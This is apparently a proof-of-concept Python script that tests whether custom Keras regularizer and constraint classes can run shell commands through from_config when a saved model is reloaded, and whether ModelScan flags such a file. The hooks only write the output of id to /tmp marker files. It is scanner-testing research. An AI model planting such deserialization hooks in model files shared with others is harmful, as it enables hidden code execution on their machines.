# File size: 1,454 Bytes
# Revision: 9e64981
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import tensorflow as tf, keras, os, sys

# Register both malicious classes
@keras.saving.register_keras_serializable(package='MyReg')
class BadReg(tf.keras.regularizers.L2):
    """Proof-of-concept L2 regularizer with a side effect in ``from_config``.

    Built directly (as in the model below), it is an ordinary L2 regularizer.
    Its ``from_config`` classmethod, which the script expects to run when the
    saved model is reloaded, first runs a shell command that writes a marker
    file. That lets the script detect whether the hook executed.
    """

    @classmethod
    def from_config(cls, config):
        """Write the /tmp/REG_RCE marker, then rebuild an L2 regularizer.

        The incoming ``config`` is ignored; the instance is always rebuilt
        with ``l2=0.01``.
        """
        # Marker side effect: writes the output of `id` to /tmp/REG_RCE.
        import os; os.system('id > /tmp/REG_RCE')
        return super().from_config({'l2': 0.01})

@keras.saving.register_keras_serializable(package='MyConstr')
class BadConstr(tf.keras.constraints.MaxNorm):
    """Proof-of-concept MaxNorm constraint with a side effect in ``from_config``.

    Built directly, it is an ordinary MaxNorm constraint. Its ``from_config``
    classmethod, which the script expects to run when the saved model is
    reloaded, first runs a shell command that writes a marker file.
    """

    @classmethod
    def from_config(cls, config):
        """Write the /tmp/CONSTRAINT_RCE marker, then rebuild a MaxNorm.

        The incoming ``config`` is ignored; the instance is always rebuilt
        with ``max_value=2.0``.
        """
        # Marker side effect: writes the output of `id` to /tmp/CONSTRAINT_RCE.
        import os; os.system('id > /tmp/CONSTRAINT_RCE')
        return super().from_config({'max_value': 2.0})

# Build a tiny functional model. The first Dense layer carries both custom
# objects, so they are serialized into the saved archive.
inputs = tf.keras.Input(shape=(5,))
x = tf.keras.layers.Dense(
    8,
    kernel_regularizer=BadReg(0.01),
    kernel_constraint=BadConstr(2.0),
    activation='relu',
)(inputs)
outputs = tf.keras.layers.Dense(1)(x)
model = tf.keras.Model(inputs, outputs)
# Writes the archive to model.keras in the current working directory.
model.save('model.keras')
# Plain string: the original f-prefix had no placeholders (ruff F541).
print("Saved model.keras")

# ModelScan test: statically scan the saved archive *before* loading it, to
# see whether the scanner reports the custom classes embedded in it.
sys.path.insert(0, '/tmp/modelscan')  # prefer a local modelscan checkout if present
from modelscan.modelscan import ModelScan
from modelscan.settings import DEFAULT_SETTINGS
r = ModelScan(DEFAULT_SETTINGS).scan('model.keras')
# NOTE(review): recent modelscan reports nest the skipped-file tally under
# r['summary']['skipped']['total_skipped'] rather than a top-level 'skipped'
# list, so the old lookup always printed S=0. Read the nested value when it is
# present; otherwise fall back to the original top-level lookup. Verify
# against the installed modelscan version.
_skipped = r.get('summary', {}).get('skipped', {})
n_skipped = _skipped.get('total_skipped') if isinstance(_skipped, dict) else None
if n_skipped is None:
    n_skipped = len(r.get('skipped', []))
print(f"ModelScan: I={len(r.get('issues',[]))} E={len(r.get('errors',[]))} S={n_skipped}")

# Drop the script's own references to the model and the custom classes before
# reloading from disk.
# NOTE(review): deleting these module-level names does not appear to remove the
# classes from the Keras custom-object registry populated by
# @register_keras_serializable. load_model can therefore presumably still
# resolve them in this process, so this run may not reflect a process that
# lacks these class definitions -- confirm.
del model, BadReg, BadConstr
import gc; gc.collect()
# Remove markers left over from a previous run. Otherwise the existence checks
# below could report True even if nothing executed during this load.
for marker in ('/tmp/REG_RCE', '/tmp/CONSTRAINT_RCE'):
    try:
        os.remove(marker)
    except FileNotFoundError:
        pass  # nothing stale to clear
# safe_mode=False relaxes Keras's safe-deserialization checks for this load.
loaded = tf.keras.models.load_model('model.keras', safe_mode=False)
print(f"Regularizer RCE: {os.path.exists('/tmp/REG_RCE')}")
print(f"Constraint RCE: {os.path.exists('/tmp/CONSTRAINT_RCE')}")